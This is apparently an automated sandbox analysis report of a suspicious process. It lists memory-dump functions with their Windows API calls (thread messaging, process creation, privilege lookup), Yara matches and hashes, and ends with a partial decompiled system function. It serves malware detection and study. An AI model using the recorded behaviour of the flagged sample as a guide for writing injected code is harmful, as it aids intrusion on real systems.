Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 026FFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFBC3

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 026FF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FF90E

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 026FF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FF9FB

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 026FFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFEDB

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 026FFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFFBF

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 026FFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFC6B

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 026FFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFDCB

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 026FFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFD9A

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 00088286, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Strings

3333, xrefs: 0008829E

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
Opcode ID: f9b86d3e6aa4ff9419179f99babe2d1b9ff48adaecfbb4ee0108c8054e6aa070
Instruction ID: dfc8275660074ee97d5eeeba7f0c2dbc77016bec65dca609b96a84c5e2f69a55
Opcode Fuzzy Hash: f9b86d3e6aa4ff9419179f99babe2d1b9ff48adaecfbb4ee0108c8054e6aa070
Instruction Fuzzy Hash: 5F01DB316402187BEB14BA949C42FFE3758BF41B20F48805DFE44AB582DAA4690157E2

Uniqueness

Uniqueness Score: -1.00%

Function 0009A052, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D

Strings

.z`, xrefs: 0009A07C, 0009A088

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 0a67031715d8aa3c953fe9e7f343dddfa24ada12d38070d37220f9f9a2283b91
Instruction ID: ad2d94da1986ca954b81b8d2750addb903cae469280f14697a9f29f65b811612
Opcode Fuzzy Hash: 0a67031715d8aa3c953fe9e7f343dddfa24ada12d38070d37220f9f9a2283b91
Instruction Fuzzy Hash: B1F0A075200100AFDB24DF69CC85EEBB7B8FF84350F108558F9889B201C631E804CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(000944F6,?,?,oL,?,000944F6,?,?,?,?,?,00000000,00000000,?), ref: 0009A04D

Strings

oL, xrefs: 0009A029

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: oL
API String ID: 1279760036-2581261730
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: fb531f36ecf60f8f990f8beeb336912dc4c8dd0bca289f823f6bbc923f289a64
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: E3E012B1200208ABDB14EF99CC41EA777ACAF88650F118558BE185B242C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D

Strings

.z`, xrefs: 0009A07C, 0009A088

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a291e4ec65558c5148eedba6729c149e861a9d856c25b40a8d06025144360991
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 25E012B1200208ABDB18EF99CC49EA777ACAF88750F018558BE185B242C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
Instruction ID: c4677aae8ac412207fcf983d3e5240e210b60c1715605391d1e4e03da92c4e84
Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
Instruction Fuzzy Hash: DD018431A802287BFB20B6949C03FFE766C6B41F50F044119FF04BA1C2EA946A0647E6

Uniqueness

Uniqueness Score: -1.00%

Function 0009A0CD, Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A124

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: bfcfcbdfd638a81b361c43055944de4fcf3724e1a89f5ab9413de031a4accdfe
Instruction ID: 82802194d6e6b4f29d5f6acfeddb981de7851d9696826a86c7d3f83767e50819
Opcode Fuzzy Hash: bfcfcbdfd638a81b361c43055944de4fcf3724e1a89f5ab9413de031a4accdfe
Instruction Fuzzy Hash: 8701A4B2200108BFCB54DF99DC81EEB77AAAF8C354F158258FA0DD7241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A124

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: be69a164b90f52cdf138f11d4f4c16ae0c8f1d3ca4b73922774bedb9ce3d57f5
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7E01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00099FE6, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(000944F6,?,?,oL,?,000944F6,?,?,?,?,?,00000000,00000000,?), ref: 0009A04D

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4e78643e32063b15afd99482d2c270f73991e153d4e1da2a0699dd6b6e64a25e
Instruction ID: e2281ab4d0ea59fcd97e7942e74ff7d99c949361163329b5e6af2d5174c79f81
Opcode Fuzzy Hash: 4e78643e32063b15afd99482d2c270f73991e153d4e1da2a0699dd6b6e64a25e
Instruction Fuzzy Hash: 15E02BB920C3401FCF11DB74AC91CEB77999FD2318725445DF89843643D620D40593F1

Uniqueness

Uniqueness Score: -1.00%

Function 0009A1BB, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d5a075a25731dcb163f5d41f48883c2f23fdcd705cd90d7c69e7059d35697bb7
Instruction ID: ff4f2714ee0f4d8bb27ab7436a865ec0383cc0c7f2ffa1162a725d5f8b91fbf5
Opcode Fuzzy Hash: d5a075a25731dcb163f5d41f48883c2f23fdcd705cd90d7c69e7059d35697bb7
Instruction Fuzzy Hash: B0E01AB5600248ABDB10DF98DC85FEB376AAF85250F018555FD5C6B242C931E814CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0009A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 89bb538c540c149beddcab492b13c1476a756bae682638512484373e91ae5804
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: B2E01AB16002086BDB10DF49CC85EE737ADAF89650F018154BE0C57242C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008F687, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2404d56cc9d5a9b12d64f6858590656c94893df05a6d1d6661c6ed1110fd0f07
Instruction ID: 4a89718c090d6414ba3836404a45d6b1e588bb591318c3fff7839de4f4d7be15
Opcode Fuzzy Hash: 2404d56cc9d5a9b12d64f6858590656c94893df05a6d1d6661c6ed1110fd0f07
Instruction Fuzzy Hash: 81E0C232A983042BFA10AEA89C03F6273D4AB45B10F490164F9889B283EAA1E9118295

Uniqueness

Uniqueness Score: -1.00%

Function 0008F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 61ef560bb03ba9adce2078f54508012ad0f896a2dd35becffac913c9d2969378
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: A6D0A7727943043BEA10FAA49C03F6632CC7B44B14F490074F948DB3C3E960E4114165

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02728788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02728788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02728460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0270E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0272718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02728460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0270E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0272718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02728460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02728460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02728460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0270E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0270E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0272718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0270E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02702340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0271E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0270E2A8(_t322,  &_v68, _v16);
								if(E02725553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0271E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0270E2A8(_t322,  &_v68, _t236);
								if(E02725553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0270E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0270E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0272718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0270E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02702340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0271E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0270E2A8(_v12,  &_v68, _v16);
							if(E02725553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0271E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0270E2A8(_t322,  &_v68, _t269);
							if(E02725553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0270E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
